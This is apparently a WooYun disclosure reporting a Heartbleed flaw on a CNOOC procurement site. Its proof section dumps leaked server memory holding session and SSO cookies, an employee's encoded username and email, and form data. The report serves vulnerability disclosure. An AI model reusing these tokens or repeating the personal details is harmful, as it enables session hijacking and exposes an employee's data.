当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124277

漏洞标题:中国海洋石油某系统站点heartbleed可抓cookie

相关厂商:中国海洋石油总公司

漏洞作者: 路人甲

提交时间:2015-07-04 22:49

修复时间:2015-07-09 22:50

公开时间:2015-07-09 22:50

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-04: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

heartbleed

详细说明:

http://sr.cnooc.com.cn/
是个采办业务系统

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 1309
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.ooc.com.cn/zh/poll.jsp..Accept-Language: zh-cn..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..Host: buy.cnooc.com.cn..Content-Length: 142..Connection: Keep-Alive..Cache-Control: no-cache..Cookie: wl_act2=n6fJVVqCZW8nWw0Qj5Yh8q20XvVPBhhpLXLfcMTRGncTPmQ2XT0R!-1697543082; emp_sso=dXNlck5hbWU9bGl5YW5nNCZidV9jb2RlPTI0ODAwLjE0MzU4ODkwNTE5ODgmZmlyc3ROYW1lPSVFNiU5RCU4RSVFNiVCNCU4QiZsYXN0TmFtZT0lRTYlOUQlOEUlRTYlQjQlOEImY29tcGFueU5hbWU9JUU0JUI4JUFEJUU1JTlCJUJEJUU2JUI1JUI3JUU2JUI0JThCJUU3JTlGJUIzJUU2JUIyJUI5JUU2JTgwJUJCJUU1JTg1JUFDJUU1JThGJUI4JmNhdGFsb2dOYW1lPWVtcHRvcmlzX2hpZXJhcmNoeSZncm91cE5hbWU9Q2xpZW50VXNlciZkYXRhYmFzZU5hbWU9Y25vb2NfZGVtbyZlbWFpbD1saXlhbmc0JTQwY25vb2MuY29tLmNuJnVzZXJMb2NhbGU9emhfQ04; emptoris_sso_session_id=784dbfd0c7da5b20f28d7a336832d7e7; ESP-SSO-logout=/sso/jsp/logout.jsp; ESP-SSO-timeout=/sso/jsp/login.jsp?jspAction=timeout; ep_srv=act1; ep_sid=LGZ.1141637516.54611; ep_slupd=act1; wl_act1=F1vQVVqJhxvY1cFMrsC791HYGVV7cvXtTT2Xmtd9LTR4HLQDZMQq!-1533068393....A.B..}i.K....[.j.:X8...../\Gn....R..K<.H./..=Ta..=I...QV)..q..3.Z..zXN5.d.a.o....9..+..y....;..,.57r....-..+....q|2M.d.E...q..L$.mG._...g7W..J..13...Z.m....:...7=D9.....g.{j@.E...z...7=D9.....g.{j@.E...z...UzB....?8..k....Z-..+f..R.....?8..k....Z-..+f..R...q.Y.]i.3{..F..d.&..v._MG..?J..!.....-#\+....n}..5.K.!7..~C"cB`.Ki.V.<...>..o.b.JI....r.X.1(..i.V.<...>..o.b.JI....r.X.1(..j.....z:[..3.=K....]...?..R....3./y.".hDX... ..[...Y1..T.l.#.]}.....[n..;.....jlo8l@....O.Y...S...K...*.T.D._H))..Z5.....;c....7..V....K.d...W.....(x.|.7.E.H.TH.[.y.A4H.TH.[.y.A4specification=50%25&_uda__292892600932452=13020506&_uda__263812115326126324543489239033304463253421495=&_uda__263812115326126324542555136848=&_uda_minQuantity=20.000&_uda_unitOfMeasure=544915312&_uda__30003358312596837327=20.000&_uda__2013236135263992133320301=&_uda__300033583135745373272133320301=%E5%90%A8&_uda_dueDate=2015%2F10%2F31+12%3A00&dom_uda_dueDate_textDate=2015%2F10%2F31&dom_uda_dueDate_listHourMinute=12%3A00&_uda_udaDouble2=&_uda_historicalCost=17%2C500.00&_uda__292892600933521259912555136848=&_uda__29289260093352125991255513684832493=&_uda__36153299923186722411=&_uda__2403721378=&_uda__20132361352232028857=&_uda__26469283043199532479=544916572&_uda__20854201823582826126=&_uda__3865627714363193639421495=&_uda__300033583132773=&_uda_Available_Currencies=CNY%7CEUR%7CUSD%7C....%..S..:%95942_75950_23817964_1=&BP_1707092_231712_21695952_261503_23852184_1=&MA_1707092_231712_21695952_261503_23852184_1=&MA_1707092_195502_21695942_53160_23792945_1=&TREE_EXPANDED_IDS=1707092%2CL1707092I21695942%2CL1707092I21695952%2CL1707092I21695962%2CL1707092I21695972%2CL1707092I21695982&MA_1707092_124932_21695972_53160_23792965_1=0.000&MA_1707092_231712_21695952_115710_23795985_1=&IS_FRAME_FULLSCREEN=false&IS_FRAME_FULLSCREEN=false&BP_1707092_219802_21695982_53160_23792925_1=&BP_1707092_231712_21695952_53160_23792955_1=&MA_1707092_124932_21695972_75950_23817984_1=2.000&BP_1707092_124932_21695962_261503_23851644_1=&MA_1707092_231712_21695952_53160_23792955_1=&MA_1707092_124932_21695962_75950_23817954_1=2.000&BP_1707092_124932_21695962_53160_23792935_1=&MA_1707092_124932_21695972_261503_23851654_1=&MA_1707092_219802_21695982_261503_23851684_1=0.000&BP_1707092_231712_21695952_261503_23851574_1=&MA_1707092_219802_21695982_115710_23796715_1=&BP_1707092_219802_21695982_115710_23796715_1=&MA_1707092_231712_21695952_261503_23851574_1=&BP_1707092_195502_21695942_53160_23792945_1=&BP_1707092_195502_21695942_115710_23797025_1=&BP_1707092_124932_21695972_115710_23796655_1=&BP_1707092_219802_21695982_261503_23851684_1=&MA_1707092_124932_21695962_115710_23797095_1=&MA_1707092_231712_21695952_75950_23817974_1=&SELECTED_SCENARIO=1500594&MA_1707092_219802_21695982_53160_23792925_1=&BP_1707092_124932_21695962_75950_23817954_1=&BP_1707092_124932_21695972_75950_23817984_1=&BP_1707092_195502_21695942_261503_23851564_1=G4...V...\....h.y..`..lPK...E-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[0]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[1]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[1]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[1]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[1]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[2]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[2]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[2]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[2]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[3]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[3]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[3]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[3]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[4]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[4]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[4]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[4]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="upload.attachment.save"-----------------------------7df3c5240592--...M.z<.5.....Z.'5^j.FR. DG.....uV.....@8.s....O@...@."3W..lY...>$./.....r;./0..}.."h..SS.....qX|.d..W2....u!...x....F..M.f77.O....Y/$...]B6..g.#...&C...M[D.7U.!.a.dn..\l..h.a..u.../#P.I..6..F....6pX.M.:.Tg.....K...FR....d'...>.....f3..<n.e...0./..../....f?.....A..ZSG^....._.~...`..hY...G.P.[.a@-29...CS.:(..e..9...L....F..p..xV.hcxR ..w..).k..o.9...x.5y..r.VwB._t..4.F...D..I..].W_O.P..*._.....8....h..'(].U..i.X.i.."L...e.> ..F....>.....W..{.I'../#.e.....s..w..v..t.Nq<?....Y..eL.97*c..hZM..'.....T.A..&s7.e.U...s../c".Q .bDrs.f4.Gk.w.7.....[....(b...E.`.m...ML.'bib+.M.y...Q..,.ED>..P.-..Q..d...(.^..5...O. .#.a!.T..7..4.=.,.Ym.>.5O...S...[.i..6...[@..-.f.l.D.eF.Zm .^|.k[@.P....s-m....e.h}.....r.<...Y..+X..u...vU.].}....^..5....f._.w....Ci....X&~..U..Y...o.:-8....meF...1.(..)....f.?..dF...A.g....$.5FJ.p.8...h.Z.....NX...}..].._u..:'..X..l..C..!24{..9}...54.....85....)..H...z....C.[.<..W..;.m....z.y..9H.Fj..D*NE.2.....2.WR\$".4$k.V..L.D...$)J.N+...H...3k"d.R\L..Iu..,.rN./.d<B..M...$.d[(#..grP.m`.g6.L....a..=d.w.q..jHY..ZYf..<]....j.._.PK....!.....s.....word/footnotes.xml...N.0....x.*.]2..Tk'A.k...B...M.%ii..7.j...;.zI.1Y..... .z....mxK....y.Z.d/..$...6*.../\..&..e.P.-.....*n.k.f....MV....c+2b &.,8(|W.AQ.L;T...Jh.+R+*...Jj.Q.t.5.....8.U..[0.....ds.9.~jNN..z.t.q0.yx.....i..j.."..LA...A...[.....<&...h...5...c...f..n..Tc...[....v...M....i.sZ...2.^.....C...M..;e.;.....PK....!.#U1.t.....word/endnotes.xml...N.0.E.H.C.}...R.&. 8.E..l'....Y.UU!6.<.9..=.l?U.4.:.:!.ED..9.R.$p...U.EB...mz}.ic.s.^fK.ML...P.-b..vO.....9(..|....z.E+2b !.....+..($..g..Z..{EjE..@.R.7.._i.b9A.sM4.....CU...ln,p..F.!9...9...;.\q...1.t.x.....xt.Ez ...,.`..d..p..3..Y....E...n..N..LS.z._e...v...M7...j.u..S.8h/u....O..?[<)v...1.....PK....!...m.....Q.word/theme/theme1.xml.YMo.E..#..F{oc'v.Gu....h.F.[..x=..zvg53N..j.HH..z.Z.$..I)*E._.....N.&I.A..!..>....3.x.N..>.....U.W<Db..i.4.....5.I..!f<&MoJ.wi.....u... ...:nz.R.....a...<!1..q.a.."X..|.|#..\...E....q.l..F.'....q.0..+..|&z.7qH.v8.j...6.h..O.(.1,..hz....6..t).p.ld.`...vk..[9..`j...t..j.V.".Zw...x.@..<.v.^9...V..Hu.L..~....*...e.o@._...Z.....7 ._..w/4Vk...BF...Z...M....g...5..UR.....g..1..Z.k...E1R.....i...@P...u..o../...,$}A...>L0..z....}rx...{....h.9T.8..T/.?.xY....'.~.....3S....~.....O_|w...)Ht...=..a.+..d NG..1-Rl...1.RJ.wT...M1K...."..o.h.e.PL.-.|%.E...hY.7.'qP.\L..=...d.q...3I.ofi..B....Rb.-J...P_p.G.....i.K.t.d..h.F..i...o.7;7Q..2...D.>a../...Q..>.X..W.....M._.u..H..q...).h+.:Vi.w.4r.B.q....."r...!..2l..a....C.b..U.|.....!.8^....8.>.,AV.t..~ls...14.._=,.....o..TV..G..".....bH.....'...4..x...w-.....E.|.F;...v..`.b3"G.'..e....\.fH..O...'.$..i_wp>.*..8....i&.LY..%\...,...x...=r6f....3.....T....)..:..Z..K...L.s..&C..M....0. .[...p@...`...j...7....Y.H.xH..i..cT5A.r...@...H....ZAZC.}.i'.RQ\m..,zo..,.gQ.u{..Y\,N/.=L._.Y.7C..6..-fS..h62.."..5.....N.H.T[X.65..4.X.%Y2.f.khi.~tCKF#..b..+.w.1m.|4`...!.:U..!.p5a:.~.{4.m..m.i..o....c..8m..D.J.pS..V..1.....?#S.i.?3E.'pS.2.....W`....q.B.](....08.....w.....n...A...[s..)k8..=. Aa?R. d.....c.U....d)#.Q.ueb...}..C!...&i.0....>..4...S.7...{....z....F.}..4..s.KvUKo....h.~1..jYU...V.H..5U8.Vk;.....L9.D... ...?*|FL.."..A3....>g.....]...d.m2iV.m.g<..r.8[kv.x....p..sj.,..z...][.jQv.1.1.i..u.....-...0%M2.oJ....3u..o%.....PK....!...f.%.....word/settings.xml.W[s.8.~.1W..8.....v;%.}.A6l.b$a...{...S...S..|:7.}.}.....pQ.vcX7.. m...=l./..20.B.....dc..0).DJ0...hE.6F..P..i.X6u..`{.,X...<.jr.a.i.m.x...a...=.m.hU.....]4...A.?K.....d.?...=1^~.....C.YA...6tL..u;...+8c=.....+c...v..PP..i.+....0.[.myO0.^Ug..I.a.}..$..:B.0B.%..?.....C.G..Y.=..|..\s.).u.....0.;\.h6.<4.^....|.x.7..>..3.h?..fm..E.9. ...0....}..B..d.~U...wd;.).nY(.`J\,.!y;.....P.s...W..G.S....P.O\.m..p.rc,.....!q..../i.Z:.\9..`.b....1..a..Lq[..ZFI|.d...x...e5N$....XT.Z6C.GA.....VR^.{..HX;.-....|.[rO.C%..0Yt..$K.....l....a....S.....s_M3.,..FLi/...Sw.....r.3....E1r...K.i..},B..gZ...H.c.n..:....X...:I.....o...qb.e.....2m....n.C....v...t...,+.b.....V..2.dE:.d.(.~q..C..{...s.T[...6.F..7p..l.m3.$(.j....D...C[}.....vB..^#.=.....:.e....-..(.k\{mk'>va..Z.5...v..`....r.L{O.9....I...Nb.....:...h...~.jc.!xe#..,.m.i...v.^.8.6.NU...?d.{\..`{7..q.Q.O.<..f$..nv..o.....v....N..&.w.rf@.f.p.Q0.....<....V.$..74..QO.w.;.....^.f..~..^-...T}[.}..pu).).@.....|.R.]~..S#X.H.xc|...G...%..b.....cw.'.=..K...\.d.z:(...V.."sf.s.Y.]dh.!%...y..>....J.g...).g...A4.a.n.M.&..4.H...S.PQ..J.(..&..fu.<..5.i~nv.nz3FNk!s.....C....k...?rw..PK....!..9T.....>.word/webSettings.xml.WK..0..W..@.w1...BVJW....v...N.d{.$i.....Us...y1..O.,..k...u.LI.+J.a*sSs.F.d/..^.~....X0.qs[...v...j....ZaP.....J.@....aLi.Z....\#[G..[..p.....Osi..s.....XN.,J..n..*I.[kn....6...C..v....M...j.....1XY....$X.....Z....`]...C..,.q..'.....7.... ./~.I.$Q.'Q:`2U.../Q.....a=.p..(...S$fQL..(&..!.K.t.G.f,O).&8.K'v.j[....,bY..cb.%.#+h.h.L...vD.,fq..l..%.#.E.....p?.@..B....?.G.....w..+..gS....PK....!..p]Oword/styles.xml.\Ko. ...<..m.x.....j...9s8=..8...X.... .$.c..d.....z|UMu../.?.'..g..#B/..n8w.(....Hz_....>H.. L....2M.....o)Vn.Y..!|... Z,|O.G.f%..`....b..).'K....l.....x..#O$..v...V...^....w...&H..1...G...\Da.8I.._&Z.a...n..$.;...?m..0...K.I.$R...0...Lz"|.v.=.....+.4..0..?...`...<.Y..:...U.-..$<U..Y..e....4./&=.26.}}..Qg.q*V.+.>.. ..E.6T....6a: ..|...T/..@N..ppA..X.j..b..2....Hv..R....\.-..z..h(wT....Z)..;j?_..6.VIRj.y...61zVc.r.aE.#..i.a.H...$.G...8.Px..C..#.u...\$.....O.!...OK..!..vc.6v.KGr...?.J!.T.....W.k..~x..4M.(.}l..\..n.'..s.....&...HG.8fe..E.....f.8h...9...A.m\.F..c....L...Cz#...Q..../..eP..c.V.&'.p...../....2..C...Et(Udj.."T8.o..'._./..R....P....h...e3....9$.:f..Y.D.b.d>.H..l..!h[`;q>?.$....E.b.l].<.@a.CVJ.Y.;b+..5d`..Z...t..w.|y6...#.. ...i_o"...r...yT..!<.I.CC.Y<..V...cj.2...B...>.9O... ..#..M.y.C.&3.1..s ^..(n../...m...I@ak..:...,K.M..f.('o...!o.P7.M.....@.....;.&`..!..2y....v..QFB8Km.. ...{ak.F..,..*X9....!o.P7.M.....@..7....&..'.f...S..M.b.C.T&o..v.D....^...M@a+.$o..[;.B..T..[A.....X..c.n....n.....y...!o.P{.n.....Xln.9.L.. 6=.@e.&...a'y.3>:y.P..2.....N.Ps.#`..T.....@.e_ ...!o...!o.P7.M.jO.. ..7....9....L.. 67.$o..G'o..[A&y.P....jN..,..*X9....!o...fk.&.a.=...8j....;....@.....;.&`..!..2y.y.....o..,F@.g..j ..-J..C..h....0.!..b..-.F..C.9>.~N..at\s3...3..*.1..Im.....r9.....1Xg.w.'.uvw]...J.fK..a..Pp.bE.,!.>XE....O.....R.y..c..<.?.[.q...U.o..a..K.L....,f.%....C../.'..dU..t....`>.S...}..}..M.....Y_.Kr..B...-@7...Y..l...gQ..}..T.2}yqtz...kL\R....|3.....!t...".P(..d.~.&.E..w.j0D.W..Nb_U..:.....S..h....F....Bc.V.i..46.D5.....|eE.W=U...U....FV....^:.}.:B..XG%lk...4.z@.u..7.e)zB.1.,....T... .M.Z.3....n.&I...`...g5..'....o....,P..~y..H.....*...k....D.|..2.....5...-`.A.O .. ....>>..... ..b.Gj&b][dK.L...$.....}][..m...T.YW...`...)....8.QT.&..+.k.v....O98...S..Ta..g...'L..MT..E..JTE*.DG<....KI.^.-b...$..]3uP.5$..7+.mH..2`...,.8...r..x..p...&._..`...Y..o.$-.8.W[(....Y.?.T.M2N5}.....MTp.L..)..".u.6R.8.....Sif[U.)9...R.Z.;x...mP'{.X.>.c..'0x"..4*mX:S..=YR.O.6i$W..@6.$cp..S.q....pp#..].....].D.xPO....w.zT...{.?...C.....,.~..o.....>.)..#.*..F1.v.nW..D...7XDPN.)....`...2;+...e..h.y./l.y.([...<S4..|..I...0...r..bd.Q. `...X....

修复方案:

补丁!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-09 22:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无